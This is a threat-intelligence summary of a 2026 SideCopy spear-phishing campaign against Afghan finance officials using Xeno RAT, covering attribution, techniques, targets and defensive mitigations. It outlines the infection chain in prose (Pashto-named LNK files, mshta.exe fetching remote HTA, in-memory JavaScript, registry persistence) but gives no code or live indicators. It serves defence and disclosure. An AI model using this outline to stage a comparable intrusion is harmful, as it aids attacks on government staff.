Full Report
Cybersecurity researchers have disclosed details of a spear-phishing campaign likely undertaken by the Pakistan-aligned SideCopy group targeting Afghanistan's Ministry of Finance with an open-source remote access trojan called Xeno RAT. "The campaign opens with a spear phishing delivery - a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename,"
Analysis Summary
# Threat Actor: SideCopy
## Attribution & Identity
* **Actor Name:** SideCopy
* **Country of Origin:** Pakistan (Pakistan-aligned)
* **Known Aliases:** Associated with the broader "Transparent Tribe" (aka APT36) umbrella.
* **Identification:** Attributed to Pakistani state-aligned interests, specifically operating as a sub-group or related cluster to Transparent Tribe.
## Activity Summary
* **Operation XENOFISCAL (2026):** A coordinated spear-phishing campaign targeting the Afghan Ministry of Finance and related provincial entities.
* **April 2025 Campaign:** Previous attribution for attacks targeting various sectors in India using Xeno RAT, Spark RAT, and CurlBack RAT.
## Tactics, Techniques & Procedures
* **Spear-Phishing (T1566.001):** Delivery via ZIP archives containing malicious LNK files with Pashto-language filenames to increase lure credibility.
* **Execution via Native Tools (T1218.005):** LNK files leverage `mshta.exe` to execute remote HTML Applications (HTA).
* **In-Memory Execution:** Use of obfuscated JavaScript executed in memory to avoid disk-based detection.
* **Persistence (T1547.001):** Establishing Registry-based persistence by mimicking legitimate applications (e.g., Microsoft Edge) and creating scheduled tasks.
* **Deception:** Deployment of decoy documents to distract victims during the infection process.
* **C2 Communication:** Multi-functional RAT capabilities over TCP for handling operator commands.
## Targeting
* **Sectors:** Government, Finance, Defense, Revenue Directorates.
* **Geography:** Afghanistan (Primary focus of current campaign), India (Historical focus).
* **Victims:**
* Afghanistan Ministry of Finance.
* Afghan Provincial revenue and finance directorates.
* Pashto-speaking government officials and employees.
* Indian military and defense infrastructure (associated Transparent Tribe activity).
## Tools & Infrastructure
* **Malware Families:**
* **Xeno RAT (v1.8.7):** Open-source remote access trojan with capabilities for keylogging, screen capture, webcam/mic monitoring, and SOCKS5 proxy tunneling.
* **Others:** Spark RAT, CurlBack RAT, and DeskRAT (associated with Transparent Tribe).
* **Infrastructure:**
* **Compromised Domains:** `[target-site].edu.af` (Afghan education domain used for staging HTA payloads).
* **C2:** Remote servers over TCP. *Note: Specific defanged IPs/URLs were not detailed in the source text.*
## Implications
SideCopy demonstrates a high degree of regional specialization, evidenced by the use of local Pashto language lures to penetrate Afghan government circles. The shift between Indian and Afghan targets suggests a strategic alignment with Pakistan's regional geopolitical interests. The transition to using open-source tools like Xeno RAT suggests a trend toward cost-effective, customizable, and potentially harder-to-attribute malware.
## Mitigations
* **Email Security:** Implement advanced attachment filtering to block or scrutinize ZIP files containing LNK, HTA, or JS files.
* **SRUM/Process Monitoring:** Monitor for `mshta.exe` reaching out to external domains or executing obfuscated scripts.
* **Endpoint Reinforcement:** Audit and restrict the creation of Scheduled Tasks and unusual Registry keys in "Run" or "RunOnce" hives.
* **Language-Based Awareness:** Conduct targeted phishing simulations for government employees using regional language lures (Pashto/Dari/Urdu).
* **Network Segmentation:** Block outbound TCP traffic on non-standard ports to disrupt RAT C2 communications.